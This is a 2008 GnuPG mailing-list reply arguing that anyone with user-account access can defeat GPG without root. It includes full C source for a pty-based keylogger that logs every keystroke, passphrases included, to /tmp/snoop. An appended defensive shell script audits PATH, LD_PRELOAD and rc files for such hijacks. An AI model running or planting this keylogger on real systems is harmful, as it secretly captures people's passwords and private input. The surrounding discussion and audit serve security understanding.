On Wed, Jun 11, 2008 at 04:31:45PM -0400, michael graffam wrote:
> On Wed, Jun 11, 2008 at 3:56 PM, David Shaw <[EMAIL PROTECTED]> wrote:
>
> > If the attacker had access to your machine to implement the LD_PRELOAD
> > attack, there are literally dozens of ways they can similarly steal
> > whatever data they are trying to steal. Why do a very complex attack
> > involving replacing libraries when they could just replace the GPG
> > binary itself?
>
> Replacing the GPG bin requires root. An LD_PRELOAD'ed lib doesn't.
Try it. I don't have to replace it for everyone - just you, and if I can
write to your computer, I can make you run any binary I want. Remember,
you own your own shell .rc file.

> > Or add a shell script named 'gpg' and put it in your
> > search path ahead of the real gpg?
>
> Again, root.

Again, .bashrc.

> > Or turn on typescript by default.
>
> Doesn't save GPG passphrases.

Why would I care about getting your passphrase if I can get everything
you typed into the message before it was encrypted?

Still, just for laughs, here's a hack that will save everything typed on
a particular terminal, including passphrases (real error checking and
proper handling of sigchld left up to the reader):

#include <stdio.h>
#include <pty.h>
#include <unistd.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc,char *argv[])
{
  int master,slave,snoop;
  pid_t pid;
  char byte;

  snoop=open("/tmp/snoop",O_WRONLY|O_CREAT|O_TRUNC,0666);

  pid=fork();
  if(pid)
    {
      struct termios term;

      tcgetattr(0,&term);
      cfmakeraw(&term);
      term.c_lflag&=~ECHO;
      tcsetattr(0,TCSAFLUSH,&term);

      close(slave);

      for(;;)
        {
          if(read(0,&byte,1)==1)
            {
              write(master,&byte,1);
              write(snoop,&byte,1);
            }
        }
    }
  else
    {
      pid=fork();
      if(pid)
        {
          close(slave);
          for(;;)
            {
              if(read(master,&byte,1)==1)
                write(1,&byte,1);
            }
        }
      else
        {
          setsid();
          close(master);
          dup2(slave,0);
          dup2(slave,1);
          dup2(slave,2);
          close(slave);
          execl("/bin/bash","/bin/bash","-i",NULL);
        }
    }

  return 0;
}

> > Or load a kernel module that changes the meaning of system calls. Or
> > replace the rng with one that isn't random. Or, or, or.
>
> Root, root, root.

Do you seriously think that someone who can write to your user-level
account can't get root pretty soon? This can be as complex as reading
bugtraq for a while until a buffer overrun comes along, or as simple as
arranging for "su" to go somewhere else.

> Get it yet? LD_PRELOAD enables attacks against GPG w/o requiring full access
> to the box.
> The attacker just needs access to the user's account.

I do get it. I'm not convinced that you do. If an attacker has access to
the user's account, it's game over. At that point, it's just a question
which particular method the attacker will choose to completely own you.

David

_______________________________________________
Gnupg-users mailing list
Gnupg-users@gnupg.org
http://lists.gnupg.org/mailman/listinfo/gnupg-users
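As an added example, not code from this thread or from GnuPG, here is a small POSIX shell audit a user can run against their own account to see whether the two user-level hijack vectors argued about above are open: a wrapper named `gpg` sitting in a user-writable directory earlier in `$PATH` than the real binary, and an `LD_PRELOAD` (or a `PATH=` rewrite) set from the environment or from the shell rc files the user owns. Function names and the sample paths in the comments are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not code from the thread: a user-level audit for the two
# hijack vectors discussed (a wrapper named "gpg" earlier in $PATH, and an
# LD_PRELOAD set from the environment or the user's own shell rc files).
# All function names are this example's own; file paths are constructed.

# Print every executable named $1 found along the PATH-style string $2,
# in lookup order. More than one line means the name is shadowed and the
# first line is the one the shell would actually run.
find_in_path() (
  set -f            # no globbing of PATH entries
  IFS=:
  for dir in $2; do
    case $dir in '') dir=. ;; esac
    if [ -f "$dir/$1" ] && [ -x "$dir/$1" ]; then
      printf '%s\n' "$dir/$1"
    fi
  done
)

# Print each PATH entry that comes *before* the first copy of $1 and is
# writable by the current user: anyone who can write as this user could
# drop a wrapper there, and it would be run instead of the real binary.
writable_dirs_before_cmd() (
  set -f
  IFS=:
  for dir in $2; do
    case $dir in '') dir=. ;; esac
    if [ -f "$dir/$1" ] && [ -x "$dir/$1" ]; then
      break
    fi
    if [ -d "$dir" ] && [ -w "$dir" ]; then
      printf '%s\n' "$dir"
    fi
  done
)

# Print the names of the given rc files that set LD_PRELOAD or rewrite PATH.
# A user-owned rc file is exactly where the ".bashrc" hijack in the thread
# would live, so any hit here deserves a manual look.
rc_files_touching_loader_or_path() {
  grep -l -E 'LD_PRELOAD|PATH=' "$@" 2>/dev/null || :
}

# Run the checks against the live environment and summarise.
audit_current_user() {
  echo "== copies of gpg on PATH (first one wins) =="
  find_in_path gpg "$PATH"
  echo "== user-writable PATH entries ahead of gpg =="
  writable_dirs_before_cmd gpg "$PATH"
  echo "== LD_PRELOAD in the environment =="
  printf '%s\n' "${LD_PRELOAD:-(unset)}"
  echo "== rc files that set LD_PRELOAD or PATH =="
  rc_files_touching_loader_or_path "$HOME/.bashrc" "$HOME/.bash_profile" \
    "$HOME/.profile" "$HOME/.zshrc"
}

audit_current_user
```

Every check here runs with the user's own privileges, which is the point of the thread: nothing listed needs root to plant, so nothing listed needs root to find, and an empty report only tells you that these particular vectors are not in use, not that the account is clean.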